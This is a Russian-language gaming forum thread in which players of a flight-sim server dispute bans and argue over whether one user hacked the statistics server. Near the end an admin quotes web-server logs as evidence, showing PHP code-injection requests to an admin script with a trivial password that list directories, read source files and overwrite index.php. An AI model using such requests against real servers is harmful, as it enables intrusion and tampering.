=sORGo=

Апелляционная тема

Рекомендованные сообщения

Ты и впрямь так думаешь? Так снимайте скорей, чтобы тень на плетень не наводить!!!

Да не думаю я так Серж, знаю что не ты и больше скажу, что искать никто не будет. Он своими выходками в своё время достаточно времени отнял у меня, Лофте, Ониби (тех.админ сервака).

Поделиться сообщением

разбанивайте, на момент бана никаких поправок к правилам не было.

Поделиться сообщением

разбанивайте, на момент бана никаких поправок к правилам не было.

В связи с неоднозначной трактовкой пункта правил об ОЗ вводится следующее пояснение:

Под стороной подразумеваются страны-участницы конфликта прямо или косвенно принимавшие участие в боевых действиях на театре военных действий представленном на данной карте.

Пример:На карте Мурманск допускается использование опознавательных знаков

RAF,т.к. 81-ая и 134-ая эскадрильи принимали участие в боевых действиях над территорией СССР.

Разницу между поправкой и пояснением объяснить?Или сам поймёшь?

Поправка - это фактически изменение/дополнение к правилам добавляющее новые ограничения либо снимающее таковые.

Пояснение - дополнение к правилам облегчающее их правильную интерпритацию.

Закон обратной силы не имеет.Бан был бы снят если в правила было бы внесено измение/поправка.

Изменено пользователем Alex.S.

Поделиться сообщением

с 8.09. по 14.09. включительно.

Срок действия бана истекает сегодня в 23:59:59

Изменено пользователем Alex.S.

Поделиться сообщением

Потестую против бана Хендрикса!

Особенно в пику того что Ос вообще говорил что он не админ :king:

Поделиться сообщением

Расскажите историю бана то.Почему Хен и почему перманентно?А то странно как-то все.

Поделиться сообщением

Расскажите историю бана то.Почему Хен и почему перманентно?А то странно как-то все.

Клаус, почитай внимательно последнюю темку мною созданную это раз, и два - посм. скрины на 12стр. в теме кандидаты на бан :drink:

Изменено пользователем =Hendrix=

Поделиться сообщением

Здесь. И странно, что не новичок.

http://homenet.beeline.ru/index.php?showtopic=220449&view=findpost&p=1064901496

Поделиться сообщением

Ввиду невозможности постинга Жужу (ограничения на форуме) шлет мне в ЛС послания. Господа админы, разберитесь с жалобами, блин!

Какого фига меня ОС(или лофте) в тихую на серваке забанили (за читы якобы)?

Серв догфайта даже не пингуется, разбанивайте.

Поделиться сообщением

Ввиду невозможности постинга Жужу (ограничения на форуме) шлет мне в ЛС послания. Господа админы, разберитесь с жалобами, блин!

Какого фига меня ОС(или лофте) в тихую на серваке забанили (за читы якобы)?

Серв догфайта даже не пингуется, разбанивайте.

Жужу, я тебя пока не банил (хотя некоторые говорят что пора бы уже) и остальные, насколько мне известно, тоже..

С какого айпишника/подсети ты заходишь на 21000 порт?

Если забанен на форуме - пиши в лс.

Изменено пользователем Lofte

Поделиться сообщением

За многочисленные акты взлома сервера статистики и прочие поступки, направленные на подрыв сервера, пилот Жужу забанен навсегда.

Прощай Жужу, нам будет тебя нехватать))

Какие ваши доказательства?

ps. Ну да, никто не банил, и никто не может бъяснить как в бан лист попал сначала дога, а через пару часов ещё и песка и разбанить почти двое суток не могли...

Изменено пользователем Zorroo

Поделиться сообщением

Какие ваши доказательства?

cocainum.JPG[

нам будет тебя нехватать

Это была шутка

Флейм и оффтоп. +10%

Изменено пользователем CorSа

Поделиться сообщением

Раз доказательств нет, значит и суда нет.

+1

Это мог сделать любой знающий человек. Сколько у нас таких людей которые ввязаны в конфликт? Я знаю только Лофте и ЖоЖо.

И почему тогда нельзя обвинить Лофте точно таким же образом как ЖоЖо, только из-за картинок "Аниме"? Любой форумчанен знает увлечение ЖоЖо, и любой может достать эти картинки, уже не говоря про Лофте. Кстати, какие были картинки? Я уверен те, которые уже видели у ЖоЖо в наличии :)

Вот если бы можно было отследить кто лазил, сохранился бы его айпиник на сервере или еще что...

Поделиться сообщением

+1

Это мог сделать любой знающий человек. Сколько у нас таких людей которые ввязаны в конфликт? Я знаю только Лофте и ЖоЖо.

И почему тогда нельзя обвинить Лофте точно таким же образом как ЖоЖо, только из-за картинок "Аниме"? Любой форумчанен знает увлечение ЖоЖо, и любой может достать эти картинки, уже не говоря про Лофте. Кстати, какие были картинки? Я уверен те, которые уже видели у ЖоЖо в наличии :)

Вот если бы можно было отследить кто лазил, сохранился бы его айпиник на сервере или еще что...

Ган, не ступай по тропе Кнута и Бадда. Нет тебя на сервере, в стате, на форуме. А раз не в курсе дел, то и писать глупости не надо.

Поделиться сообщением

По первому случаю подмены файла ядра, тех. админ Билайна подтвердил факт, что под видом картинки с профиля ЖоЖо был закачен скрипт, который позволял беспрепятственно изменять данные статистики. По последнему случаю было проделано тоже самое, после чего Лофте в течении часа занимался исправлениями и блокировал возможность закачивать пользователями картинок на личную страницу стата.

Аир, шёл бы косяки в БоБе искать. Тоже мне адвокат нашёлся.

Поделиться сообщением

Александр. Идут разговоры слепого с глухими? Тебе по сто раз одно и тоже, что в ТС, что в ЛС, что на форуме,а как об стенку горох.

Ты своего добился, все тебя заметили и отметили твой программистский талант, ты звезда! Что дальше? Цель твоих усилий тешить самолюбие путём устраивания козней? Глупость номер один. Всё равно на каждую хитрую ж%%%% есть *%%%% с винтом.

Ты умудрился поставить против себя не только самодуров-админов, но и весь чесной народ. Это глупость номер 2. Так что давай, про доказательства не будем.....

И вообще, чего я с тобой говорю как с маленьким?

+10, мат закрываем символами полностью!

sorgo

Изменено пользователем =sORGo=

Поделиться сообщением

А вот то что в ТС сказали, чисто логически пока что опровергается, меня это оч. расстраивает. И логов я так и не получил.

Получается обманывает меня тов. Ос.

По первому случаю подмены файла ядра, тех. админ Билайна подтвердил факт, что под видом картинки с профиля ЖоЖо был закачен скрипт, который позволял беспрепятственно изменять данные статистики.

это когда было то? =)

По последнему случаю было проделано тоже самое

тогда почему этот некто, просто не удалил всю БД или все файлы статистики, а взялся лишь за аватарки?

выходит не тоже самое.

А вот что, пусть сейчас тех. админ билайна тоже подтвердит, угу? =)

Глупость против безнаказанности. Может не такая уж и глупость?

Поделиться сообщением

Простой вопрос и однозначный ответ- http://homenet.beeline.ru/index.php?showtopic=297073, открытая тема, которая вызвала такой резонанс,это твоих рук дело?

Поделиться сообщением

Простой вопрос и однозначный ответ- http://homenet.beeline.ru/index.php?showtopic=297073, открытая тема, которая вызвала такой резонанс,это твоих рук дело?

Да, мне тоже интересно)) Что скажешь жужу?) Да или нет?

Поделиться сообщением

Вот что ты, что Хендрикс, ей Богу, как дети малые. Ни у одного, ни у второго соображухи не хватает, как жить в мире и согласии

ну, когда тебя будут кикать, забанят за знаки пару раз, обвинят в читерстве, когда тебя в тихушку забанят на серваке, будешь жить в мире и согласии :)

Простой вопрос и однозначный ответ- http://homenet.beeli...howtopic=297073, открытая тема, которая вызвала такой резонанс,это твоих рук дело?

А ты у тех админов спроси.

И то что ты мне в личке, вторые сутки, не можешь ответить на два простых вопроса, я воспринимаю однозначно.

Поделиться сообщением

А ты у тех админов спроси.

И то что ты мне в личке, вторые сутки, не можешь ответить на два простых вопроса, я воспринимаю однозначно.

)))) Я у тебя хочу спросить как у достоверного источника. Чего выворачиваешься как уж на сковородке- да или нет?

Поделиться сообщением

нет конечно, я вобще без понятия как такое можно сделать...

А вот мои два вопроса

1) Как я мог попасть в среду в бан дога, а ПОТОМ и песка.

2) Почему почти двое суток не могли разбанить? даже когда определили причину?

(все это было до аватарок)

И ещё на этот, раз это был взом

тогда почему этот некто, просто не удалил всю БД или все файлы статистики, а взялся лишь за аватарки?

Поделиться сообщением

я вобще без понятия как такое можно сделать...

Ну, раз память отшибло, я тебе напомню.

Не подскажешь - 91.219.57.35 - что за айпишник и как он оказался в логах у билайна в апреле?

Не его ли ты случайно высылал мне недавно на проверку?))

91.219.57.35
- - [13/Apr/2011:01:38:29 +0400] "GET

/admin/editall.php?pass=123&e=1&q=print_r(scandir('../')); HTTP/1.0"

200 632 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62

Version/11.00"

просмотр директории

91.219.57.35
- - [13/Apr/2011:01:38:39 +0400] "GET

/admin/editall.php?pass=123&e=1&q=readfile('../index.php'); HTTP/1.0"

200 2288 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62

Version/11.00"

91.219.57.35 - - [13/Apr/2011:01:38:49 +0400] "GET

/admin/editall.php?pass=123&e=1&q=readfile('../programs/_pilots.phm'); HTTP/1.0"

200 42029 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62

Version/11$

просмотр файлов

91.219.57.35
- - [13/Apr/2011:01:39:09 +0400] "GET

/admin/editall.php?pass=123&e=1&q=file_put_contents('../index.php',str_replace('include%20%22modules/pilots/index.phm%22;','include%20%22programs/_pilots.p$

замена файлов

И эта.. у нас тут не суд по правам человека. У нас тут суд линча. Раз попался - второй раз разбираться не будет никто..

Топай на другие сервера, tovarisch

Поделиться сообщением

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас